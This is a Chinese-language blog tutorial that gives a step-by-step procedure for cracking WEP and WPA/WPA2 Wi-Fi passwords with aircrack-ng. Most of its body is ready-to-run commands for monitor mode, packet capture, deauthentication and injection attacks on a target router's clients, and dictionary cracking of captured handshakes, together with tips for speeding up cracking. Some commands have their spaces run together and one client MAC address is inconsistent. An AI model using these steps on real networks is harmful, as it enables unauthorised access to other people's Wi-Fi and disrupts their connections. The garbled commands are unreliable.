使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密碼。

1.首先請不要使用此方法去搞破壞,去蹭Wi-Fi,因為不裝逼地說,我認為技術(shù)本身的價值很大,尤其是在學(xué)習(xí)這個技術(shù)的過程中解決遇到的問題,當(dāng)經(jīng)過重重困難最后終于成功之后的喜悅又怎么能拿去蹭網(wǎng)呢。我在此過程中都是用自己路由做的測試,相信大家也可以從文中看到,所以請不要用技術(shù)做一些不好的事情。

2.歡迎使用Kali Linux 的朋友互相交流,大家共同進步學(xué)習(xí)。

索引:
1.工具
2.需要了解的知識
3.破解WEP
4.破解WPA/WPA2
5.其他
6.Q&A
7.參考文章

1.用到的工具:

Airodump-ng 獲取 AP 的 MAC 信息,連接信息以及是否握手成功。

Aircrack-ng 支持基于 802.11 協(xié)議的 WEP 和 WPA/WPA2-PSK 密碼破解

Aireplay-ng 強行向目標(biāo) AP 發(fā)送數(shù)據(jù)包

Airmon-ng 開啟無線網(wǎng)卡的監(jiān)視模式

Wordlists.txt 字典包

2.需要了解的知識:

AP(Access Point): 網(wǎng)絡(luò)接入點,是一種連接無線或有線網(wǎng)絡(luò)的設(shè)備。就是我們俗稱的路由器。

MAC(Media Access Control Address): 相當(dāng)于網(wǎng)卡的身份證,MAC 地址本身是不能修改,但是可以通過偽造MAC 地址欺騙AP。

WEP(Wireless Encryption Protocol): 無線加密協(xié)議。很早的一種加密協(xié)議,容易破解。

WPA/WPA2(Wi-FiProtected Access): 基于WEP更安全的加密系統(tǒng)。

Handshake:握手。我的理解相當(dāng)于三次握手。

IV(Initialization Vector)s:初始化向量。

3.破解 WEP 加密的 Wi-Fi 流程(現(xiàn)在基本沒人用WEP,只做步驟演示):

3.1
<code>iwconfig #確認網(wǎng)卡信息。</code>


表示設(shè)備WLAN0待命并且當(dāng)前模式為被管理(Managed)。

3.2
<code>airmon-ng start wlan0 #激活網(wǎng)卡至監(jiān)視模式。</code>

會發(fā)現(xiàn)不能正常開啟,有5 個進程會導(dǎo)致錯誤。

解決方案:
(1).
<code>ifconfig wlan0mon down #先取消wlan0mon網(wǎng)卡模式</code>
<code>iwconfig wlan0mon mode monitor #直接設(shè)置wlan0mon為監(jiān)視模式</code>
<code>ifconfig wlan0mon up #喚醒wlan0mon</code>

(2). 第2 步開始前, <code>airmon-ng check kill</code>,自動檢查沖突程序并強制關(guān)閉。

使用<code>iwconfig</code>查詢發(fā)現(xiàn) wlan0mon 為監(jiān)視模式

3.3 <code>airodump-ng wlan0mon #獲取附近AP 信息。</code>

看到名為 TEST-jglimmers 的路由器信息。

這里解釋幾個參數(shù):
BSSID(Basic Service SetIdentifier): AP 的MAC 地址。
ESSID(The Extended Service Set Identifier): AP 的名稱。
PWR(Power): 信號強度。
Beacons: AP發(fā)出的通告編號,每個接入點(AP)在最低速率(1M)時差不多每秒會發(fā)送10個左右的beacon,所以它們能在很遠的地方就被發(fā)現(xiàn)。
#Data:當(dāng)前數(shù)據(jù)傳輸量。
#/s:過去10秒鐘內(nèi)每秒捕獲數(shù)據(jù)分組的數(shù)量。
CH(Channel): AP 所在的頻道。
MB: AP 的最大傳輸速度。MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g。后面帶.的表示短封包標(biāo)頭,處理速度快,更利于破解。
ENC(Encryption): 使用的加密算法體系。
CIPHER: 檢測到的加密算法。#這個和ENC 的區(qū)別我確實不明白,有沒有知道的朋友可以告訴我。
AUTH(Authority): 認證方式。
Elapsed: 用過的時間。

記錄 TEST-jglimmers 的 MAC 地址(BSSID),頻道(CH)。

BSSID: 88:25:93:5A:B5:6A
CH: 1

3.4 <code>airodump-ng --ivs -w 文件地址 --bssid BSSID wlan0mon #開始抓包, -w(write) 抓到的包保存的位置, --ivs表示只保留IVs 文件。(IVs 在2 中已解釋)</code>

可以看到有一臺 MAC 地址為 48:74:6E:2B:70:02 的設(shè)備在連接 AP 。

重新開一個終端進行下一步
3.5 <code>aireplay-ng -3 -b BSSID -h 客戶端MAC wlan0mon #理論上來講不用這一步,但是我們可以使用這條命令向 AP 發(fā)送大量數(shù)據(jù)包更快取得數(shù)據(jù)包。</code>

可以看到在第3.4 步開啟的終端中有大量數(shù)據(jù)。

3.6 <code>aireplay-ng -0 10 -a 88:25:93:5A:B5:6A -c 68:17:29:26:C3:16 wlan0mon #如果發(fā)現(xiàn)像我一樣得到的數(shù)據(jù)較少可嘗試發(fā)送數(shù)據(jù)包</code>

3.7 <code>aircrack-ng01.ivs #01.ivs 在第 3.4 步的文件夾當(dāng)中.</code>

等待破解成功。

4.破解 WPA/WPA2 加密的 Wi-Fi 流程

前面的過程和 3.1,3.2,3.3 一樣。使 wlan0mon 處于監(jiān)視模式下

4.1 <code>airodump-ng --bssid BSSID -c CH -w 文件位置 wlan0mon #-w 是抓的包輸出目錄,注意加-c,不然airodump-ng會每個頻道都會試,一直亂跳,下一步工作不好進行。</code>



這時返回的數(shù)據(jù)表示連接上此AP 的設(shè)備信息。

重新開啟一個終端,進行下一步
4.2 <code>aireplay-ng -0 10 -a BSSID -c STATION wlan0mon #-0 表示DeAuth模式,10表示攻擊次數(shù),-c是第3 步中的得到的STATION,即已連接上的客戶端MAC 地址。</code>



Wi-Fi的連接過程大概有三種,發(fā)現(xiàn)(Unauthenticated & Unassociated,未認證,未連接)-認證(Authenticated & Unassociated,認證,未連接)-連接(Authenticated & Associated,認證,連接)。

-0(DeAuth模式): 向客戶端發(fā)送數(shù)據(jù)包,讓客戶端誤以為是AP 發(fā)送的數(shù)據(jù)。
<code>aireplay-ng -0 10 -a BSSID-c 客戶端的 MAC wlan0mon</code>
-1(Fake authentication 模式):在WEP中允許兩種認證類型(開放系統(tǒng)和共享密鑰)連接AP,我們在路由器設(shè)置頁面可以看到。當(dāng)我沒發(fā)現(xiàn)4.1 中沒有客戶端連接時候可以使用此攻擊模式。
<code>aireplay-ng -1 0 -e ESSID -a AP的MAC -h 自己的MAC -y sharedkeyxor wlan0mon #0表示發(fā)送數(shù)據(jù)時間,-h 自己的MAC 可用<code>ifconfig</code>查詢,-y sharedkeyxor表示共享密鑰型,如果是開放系統(tǒng)則不用-y</code>
-2(Interactive packet replay):這個模式需要了解相關(guān)知識,可以去Interactivepacket replay 查看。
-3(ARPrequest replay): 可以了解相關(guān)知識 ARPrequest replay attack
<code>aireplay-ng -3 -b AP的MAC -h 我們的MAC wlan0mon #可以加-r CAP.cap 加速進程,這個 CAP.cap 是上一次成功進行 ARP 連接的 cap 包。</code>
或者直接
<code>aireplay-ng -3 -r CAP.cap wlan0mon</code>
-4( KoreKchopchop):這個模式如果成功的話可以不用知道密碼直接解密WEP數(shù)據(jù)包,但是有些AP 不支持此模式。
<code>aireplay-ng -4 -b AP的MAC -h 我們的MAC wlan0mon</code>
-5(Fragmentation): 碎片模式,也不包含密碼信息,故不討論,可去Fragmentationattack 查看詳情。
-6(CafeLatte):可以直接從客戶端系統(tǒng)中直接獲取WEP密碼,但是必須從客戶端系統(tǒng)中獲取到ARP包,并加以處理后返回給客戶端。
<code>aireplay-ng -6 -b AP的MAC -h 我們的MAC -D TEST-jglimmers #-D表示取消AP 的探測</code>
-7(Hirte): 基于上一個模式的攻擊,也是需要ARP請求。
<code>aireplay-ng -7 -h 我們的MAC -D TEST-jglimmers</code>
-8(WPAMigration):這個模式在我看了官方文檔后感覺非常強大,強大到我想讓大家自己去 WPAMigration Mode 看看。它可以將WPA強制轉(zhuǎn)換成 WEP 解密,但是僅限思科的 AP(>=IOSReleases 12.2(11)JA),并且同時連接了 WEP 和 WPA 的客戶端。
-9(Injection test): 測試一下網(wǎng)卡是否連接成功,其實我們在3.2 就已經(jīng)成功,不過還是可以驗證一下。
<code>aireplay-ng-9 -a AP的MAC-i wlan1wlan0mon# wlan1是模擬的一個AP。</code>

這時能看到第1 步中的設(shè)備出現(xiàn)了大量數(shù)據(jù)讀取。

4.3 等待握手。
當(dāng)經(jīng)過第2 步發(fā)送大量數(shù)據(jù)包之后只要發(fā)現(xiàn)第1 步中右上角出現(xiàn)了 handshake: AP的MAC(BSSID),就可以 CRTL+C 停止。

4.4 <code>aircrack-ng -w Wordlists.txt CAP-01.cap #-w表示字典包的路徑, CAP 表示第 1 步中保存的文件中 -01.cap 文件,因為我們對每個 AP 的嘗試可能不止一次,所以 airodump-ng 會自動在文件名后加類似01,02這樣的數(shù)字表示次數(shù),所以記得最后破解的時候輸入正確的 CAP 包名稱。</code>



破解的速度一般顯卡也就這樣,其實我們也可以根據(jù) GPU 加速,但是我曾經(jīng)經(jīng)過好幾個月的試驗最后發(fā)現(xiàn)我的顯卡不支持 GPU 加速。

4.5 等待 KEY FOUND!


破解成功。

5.其他
推薦一個字典生成工具 Crunch.


6.Q&A

Q: 修改成監(jiān)視模式(Monitor)失敗。
A:
(1).
<code>ifconfigwlan0mondown #先取消wlan0mon網(wǎng)卡模式</code>
<code>iwconfigwlan0monmode monitor #直接設(shè)置wlan0mon為監(jiān)視模式</code>
<code>ifconfigwlan0monup #喚醒wlan0mon</code>

(2). 所有工作開始前 <code>airmon-ngcheck kill</code> 自動檢查沖突程序并強制關(guān)閉。

Q:破解之后不能正常聯(lián)網(wǎng)。
A:
<code>ifconfigwlan0mondown</code>
<code>iwconfigwlan0monmode managed</code>
<code>ifconfigwlan0monup</code>
因為之前將 wlan0mon 改成了 監(jiān)視模式(Monitor),現(xiàn)在要改回來(Managed)。

Q:不能握手。
A:嘗試物理距離靠近路由,重復(fù)發(fā)送數(shù)據(jù)包,再等等。

Q:不能破解。
A:換強字典包。

Q:破解速度太慢。
A:嘗試 GPU 加速,或使用 hashcat 加速。

7.參考文章

http://www.aircrack-ng.org/documentation.html

http://www.aircrack-ng.org/doku.php?id=airodump-ng

http://www.aircrack-ng.org/doku.php?id=fake_authentication

http://www.thinksaas.cn/group/topic/120506/

http://m.blog.chinaunix.net/uid-29170659-id-4944188.html

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 228,702評論 6 534
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 98,615評論 3 419
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 176,606評論 0 376
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經(jīng)常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,044評論 1 314
  • 正文 為了忘掉前任,我火速辦了婚禮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 71,826評論 6 410
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 55,227評論 1 324
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,307評論 3 442
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 42,447評論 0 289
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 48,992評論 1 335
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 40,807評論 3 355
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,001評論 1 370
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,550評論 5 361
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 44,243評論 3 347
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 34,667評論 0 26
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 35,930評論 1 287
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 51,709評論 3 393
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 47,996評論 2 374

推薦閱讀更多精彩內(nèi)容